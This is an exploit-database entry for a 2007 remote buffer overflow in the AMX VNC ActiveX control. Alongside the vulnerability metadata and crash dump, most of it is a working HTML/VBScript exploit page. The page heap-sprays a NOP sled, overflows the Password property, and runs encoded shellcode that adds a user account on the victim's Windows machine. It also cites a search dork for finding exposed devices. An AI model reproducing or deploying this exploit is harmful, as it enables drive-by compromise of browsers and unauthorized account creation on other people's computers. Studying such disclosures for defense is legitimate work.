AMX Corp. VNC ActiveX Control remote buffer overflow exploit

vendor:

VNC ActiveX Control

by:

rgod

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: VNC ActiveX Control

Affected Version From: AmxVnc.dll 1.0.13.0

Affected Version To: AmxVnc.dll 1.0.13.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP2 with IE6

2007

AMX Corp. VNC ActiveX Control remote buffer overflow exploit

This is a remote buffer overflow exploit for the AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0). It has been tested against IE6 on XP SP2. The vulnerability allows an attacker to execute arbitrary code remotely by passing a malicious input to the Host property. The exploit triggers a buffer overflow, resulting in an access violation when reading a specific memory address. The Password and LogFile properties are also vulnerable to the same issue.

Mitigation:

Apply the latest patch or update from the vendor. Restrict access to the affected ActiveX control.

Source

Exploit-DB raw data:

<!--
21.17 23/06/2007
AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) remote buffer
overflow exploit / tested against IE6 on xp sp2 it

found this one inside GHDB, dork by JimmyNeutron:
WebControl intitle:"AMX NetLinx"
description:   "AMX Netlinx is a server appliance which
connects various devices like a beamer, laptop or video
recorder to the internet."

passing A*2000 to Host property:

EAX 03727C20
ECX 027B7890 ASCII "AAAAAAAA...
EDX 41414141
EBX 027ACE80 AmxVnc.027ACE80
ESP 0013DDFC
EBP 0013DE28
ESI 0013E00C
EDI 00000000
EIP 0278D6D1 AmxVnc.0278D6D1
0278D6D1   FF52 04          CALL DWORD PTR DS:[EDX+4]
Access violation when reading 41414145


Password, LogFile properties are also vulnerable
to the same issue

object safety report:

RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
KillBitSet: False

translation: it works remotely without warnings

rgod
site: retrogod.altervista.org

-->
<HTML>
<object classid='clsid:6318EFFA-BE57-49EE-830C-C5E1ABD9ECCB' id='AmxVnc' ></OBJECT>
<script language='vbscript'>

'metasploit one, add a user "su" with pass "tzu"
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")
nop = string(9999999,unescape("%90"))
jmp = unescape("%ab%08%3e%7e") '0x7e3e08af user32.dll ,stores 0x07c435ff which reasonably points to our 10M nop, found with msfpescan
suntzu = String(1188, "A") + jmp + nop + scode
AmxVnc.Password = suntzu

</script>
</HTML>

# milw0rm.com [2007-06-28]